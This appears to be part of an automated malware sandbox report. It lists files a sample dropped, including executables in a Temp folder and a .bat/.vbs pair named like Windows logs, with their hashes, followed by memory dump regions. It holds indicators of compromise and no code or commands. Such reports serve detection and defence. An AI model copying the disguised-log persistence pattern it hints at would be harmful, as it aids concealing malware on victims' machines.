c216eda372556eb78e680bde247c2fd2085642ee33031905a213c6bec502ccce

SHA512
fc4678133318fe1952947be74e244246336c7faacc9b9ae32336d57b106ec8f044e5db41dd98e8f3a54270ddacab2fc84a66d5d67deeadc3056ea5213bcbbba4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
72903459f297d1561ed59e88f6266c39

SHA1
22275691405b29149354de4bf3a40bd7cef6f6de

SHA256
34dd19ebba6598d5f586b5c7ac30babf89d055b5f1a6e959129a39311fe4026b

SHA512
6c04ccf522b8b544de9da57b791e7f4a3ff1de200f8a641de106f75270759e04ba028fd6db7e3784bb0233ac3c1f92ec3473d703b9ac585d4851d277d12db10f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef647504cf229a16d02de14a16241b90

SHA1
81480caca469857eb93c75d494828b81e124fda0

SHA256
47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

SHA512
a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2ea9a33db82a39cf8107405e339a417f

SHA1
9896686029832ffea53a657fa18e1956d9b6a7a6

SHA256
c8d47b5b939d02895a8c27ec4098cd6afbb4ec10656124a9dfc5427689a9fa07

SHA512
7036f03f09c3df678b967da75df04d0a56a28de1595567de9d2dcfd12e2f5a606f342bb05cd76fa15a1f7ae6fe283b991154b049b6c362542e565ee777f12f32

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izhnvrzb.3iv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe

Filesize
409KB

MD5
301613f1fcda48ebade4c197175be1a0

SHA1
03f58ab72f3c2d991418861adfc9c3b3289640a0

SHA256
1772f8bfc84772485e5b2388bb8942c28a9f2803a5f879e275d9b9d3eb923d41

SHA512
375c55fc09f1f0ef1a394b57f38916f103c36aaf8f4ec9a6939dcfaf147ebc3121537f2ebe1061b3851043dd44001f0a6630abe8e32549bf95d3e12f81308525

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe

Filesize
63KB

MD5
ec57b49d155e05d971f73e2eb3d3d01f

SHA1
f8537e9b44342a71f1f8bf48548b27574f17ff7c

SHA256
baf3237f6c2b6c49ca7572213bc72f0dea9a4afcd37f90ea2d13a542d83d2a9c

SHA512
e27191657d4339d44dfb32a637efe1168d57520ee1c320dc7997f8944c627595e66abe72ed5039f005b01e2e2d1a5ca9df7c5a10ad0092305c07dd64f29ff533

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe

Filesize
81KB

MD5
6fac9c3612488908d9aa6ed9e8234f9f

SHA1
8b36017162e06e76a450e2ecceee4d3a68bb3905

SHA256
0ca49b53ed70a9fabe46a92daa4a134f1afaf99b9098f81e33084a95c8586606

SHA512
e71b4cef4f488fc2cc771c1df5466ed6edd12d5cf3bfcf2825f0ec87bbcb66afabcba957dbfeee621e3c03e897bec1cede8d88f3c9e255b4fd40ddbdfaa5794e

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_946.bat

Filesize
580KB

MD5
8b844b2b29752a8a1c62efaa59dba4be

SHA1
0c467148d558c4b7d6672d5b26a79af5f7fb96d4

SHA256
ccb4ad561b87927edd97a02436014944c9147fe78934d2a26de73c7ee1704d0d

SHA512
e086dfb88842e19c552ec00d989ae453743cabeddae93359cde6afc62354042d6ab366039e71819ad0a79319fb17ce98ec77bafb31f6183ba8a87cbb2c1df8a0

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_946.vbs

Filesize
115B

MD5
5bd6f47ffea01fb161ceda7adb5b0de7

SHA1
62b755b32997868760c5b9f78ba9802bbf1ecbd2

SHA256
abadd997c1f7b68fa8fd82002f653a66dfbcffc1f8fc94350b86dfa1c1da6182

SHA512
846486b50c76077035325efd27dda736eadf68b2880685f1b9f948b906c0d9993941bf2bf42cf215bdb62649a60c629175847b641aa759c35a857dc6ee158caa

Download Submit
memory/1072-88-0x0000000000640000-0x0000000000656000-memory.dmp

Filesize
88KB

Download
memory/4088-89-0x00000000002F0000-0x000000000030A000-memory.dmp

Filesize
104KB

Download
memory/4088-188-0x000000001C040000-0x000000001C04E000-memory.dmp

Filesize
56KB

Download
memory/4592-94-0x0000000005740000-0x0000000005752000-memory.dmp

Filesize
72KB

Download
memory/4592-93-0x00000000051F0000-0x0000000005256000-memory.dmp

Filesize
408KB

Download
memory/4592-92-0x0000000005100000-0x0000000005192000-memory.dmp

Filesize
584KB

Download
memory/4592-95-0x0000000006330000-0x000000000636C000-memory.dmp

Filesize
240KB

Download
memory/4592-97-0x0000000006B70000-0x0000000006B7A000-memory.dmp

Filesize
40KB

Download
memory/4592-90-0x00000000007A0000-0x000000000080C000-memory.dmp

Filesize
432KB

Download
memory/4592-91-0x00000000057A0000-0x0000000005D44000-memory.dmp

Filesize
5.6MB

Download
memory/4644-56-0x0000026A9B600000-0x0000026A9B618000-memory.dmp

Filesize
96KB

Download
memory/5008-57-0x00007FFE30440000-0x00007FFE30F01000-memory.dmp

Filesize
10.8MB

Download
memory/5008-0-0x00007FFE30443000-0x00007FFE30445000-memory.dmp

Filesize
8KB

Download
memory/5008-16-0x000002045B8B0000-0x000002045B960000-memory.dmp

Filesize
704KB

Download
memory/5008-15-0x000002045B730000-0x000002045B738000-memory.dmp

Filesize
32KB

Download
memory/5008-14-0x000002045B830000-0x000002045B8A6000-memory.dmp

Filesize
472KB

Download
memory/5008-12-0x000002045B760000-0x000002045B7A4000-memory.dmp

Filesize
272KB

Download
memory/5008-13-0x00007FFE30440000-0x00007FFE30F01000-memory.dmp

Filesize
10.8MB

Download
memory/5008-11-0x00007FFE30440000-0x00007FFE30F01000-memory.dmp

Filesize
10.8MB

Download
memory/5008-1-0x000002045B1F0000-0x000002045B212000-memory.dmp

Filesize
136KB

Download
memory/5064-32-0x00007FFE30440000-0x00007FFE30F01000-memory.dmp

Filesize
10.8MB

Download
memory/5064-29-0x00007FFE30440000-0x00007FFE30F01000-memory.dmp

Filesize
10.8MB

Download
memory/5064-28-0x00007FFE30440000-0x00007FFE30F01000-memory.dmp

Filesize
10.8MB

Download
memory/5064-18-0x00007FFE30440000-0x00007FFE30F01000-memory.dmp

Filesize
10.8MB

Download